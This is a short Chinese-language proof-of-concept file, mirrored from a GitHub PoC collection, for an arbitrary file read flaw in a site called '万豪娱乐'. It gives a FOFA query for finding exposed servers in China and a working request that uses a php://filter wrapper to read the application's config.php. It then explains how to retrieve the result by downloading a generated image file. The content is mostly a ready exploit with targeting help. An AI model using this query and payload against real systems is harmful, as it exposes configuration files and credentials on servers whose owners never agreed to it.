mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 11:57:27 +00:00
22 lines
776 B
Markdown
22 lines
776 B
Markdown
|
# 万豪娱乐存在任意文件读取漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
万豪娱乐存在任意文件读取漏洞
|
|||
|
|
|
|||
|
|
# <font style="color:rgb(51, 51, 51);">二、资产测绘</font>
|
|||
|
|
+ fofa`"Public/Js/Mobile" && country="CN"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
# 三、漏洞复现
|
|||
|
|
```plain
|
|||
|
|
/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
<font style="color:rgb(52, 73, 94);">使用poc访问后,接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容</font>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-11-27 10:00:05
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ifd65o9r8hm8m0ac>
|